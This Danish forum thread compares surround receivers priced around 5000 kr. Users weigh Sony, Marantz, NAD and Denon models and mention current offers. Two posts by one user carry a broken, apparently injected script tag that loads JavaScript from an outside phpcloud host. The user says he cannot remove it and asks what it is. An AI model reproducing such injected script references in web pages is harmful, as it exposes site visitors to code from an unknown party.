|
Surround receiver til 5000 |
Besvar ![]() |
Side <12 |
Forfatter | |
Supergris ![]() Guld medlem ![]() Oprettet: 10-December-2006 Sted: Esbjerg Status: Offline Point: 1474 |
![]() ![]() ![]() ![]() ![]() |
Et godt bud:< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
http://www.cinemagic.dk/shop/sony-str-dn1040-7-324326p.html
|
|
![]() |
|
Supergris ![]() Guld medlem ![]() Oprettet: 10-December-2006 Sted: Esbjerg Status: Offline Point: 1474 |
Jeg undskylder, det ekstra link, der bliver indsat efter mit svar.< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
Det er kommet i går, og kun i dette forum. Jeg kan ikke fjerne det. Nogle ideer, hvad det kan være???
|
|
![]() |
|
thomnico ![]() Super bruger ![]() Oprettet: 06-November-2007 Sted: Albertslund Status: Offline Point: 493 |
Jeg står lidt i samme dilemma, jeg har en ældre T752 og er ovenud tilfreds med lyden, men vil man skifte til en andet mærke for at få flere funktioner inbygget? eller skal man beholde den gode lyd fra NAD og bare opgrade til en ny NAD?
følger med på sidenlinjen :-) |
|
![]() |
|
jacobthor91 ![]() Guld medlem ![]() ![]() Oprettet: 27-September-2012 Sted: ikast, danmark Status: Offline Point: 673 |
jeg kunne godt finde på at investere i den marants der er her på siden, kender ikke tilæ sonys produkter, men om man til den pris kan få noget der er bedre end den NAD jeg i forvejen har tvivler jeg nu meget på, godt nok har den flere gadgets end min NAD, men tror ikke (uden at vide det) den magter opgaven i lyden ligeså godt som min NAD. nogen af jer der har haft sony som kan fortælle lidt om den?
|
|
![]() |
|
blumenburg ![]() Super bruger ![]() Oprettet: 30-April-2012 Sted: mesinge/fyn Status: Offline Point: 383 |
Hovedet på blokken. Den marantz sparker røv. 12000 har den kostet
for ganske nylig. Ingen chance for at finde en ny recicer i 5000 kr klassen som du får samme vellyd ud af. |
|
setup: Sony xf9005 65"
canal digital sat Marantz SR7009 fronter: xtz 99,26 mk2 center : B&W xtc bag ht : B&W xt2 sub : xtz 10.17 edge |
|
![]() |
|
jacobthor91 ![]() Guld medlem ![]() ![]() Oprettet: 27-September-2012 Sted: ikast, danmark Status: Offline Point: 673 |
det er også hvad jeg kan læse mig til omkring den:) desværre blev jeg brændt af da mit gamle setup skulle sælges, og derfor er pengene ikke dertil endnu, det er ikke let at være studerende og så gerne vil bruge 5000 pr hifi udstyr når der samtidig er en søn der skal have tøj på kroppen og en kæreste der også skal forkæles:)
men nu ser vi imorgen er der en som har sagt han vil kigge forbi, hvis det lykkes er jeg klar på den marants:)
|
|
![]() |
|
Juleulven ![]() Super bruger ![]() Oprettet: 28-Juni-2008 Sted: Denmark Status: Offline Point: 484 |
nu har jeg haft en NAD T748'er til låns hen over weekenden og der er en klar forskel på min gamle Denon AVR-1911 også NAD'en...
Både fruen og jeg selv syntes anlægget kan spille højere med mine gamle M&K K7'ere, bedre surround effect (kraft?) ... ¨ Så jeg tror nu vi ender på tilbuddet til 4500,- inkl. en ATV3 .. |
|
![]() |
Besvar ![]() |
Side <12 |
Skift forum | Forum-tilladelser ![]() Du kan ikke oprette nye emner i dette forum Du kan ikke besvare indlæg i dette forum Du kan ikke slette dine indlæg i dette forum Du kan ikke redigere dine indlæg i dette forum Du kan ikke oprette afstemninger i dette forum Du kan ikke stemme i dette forum |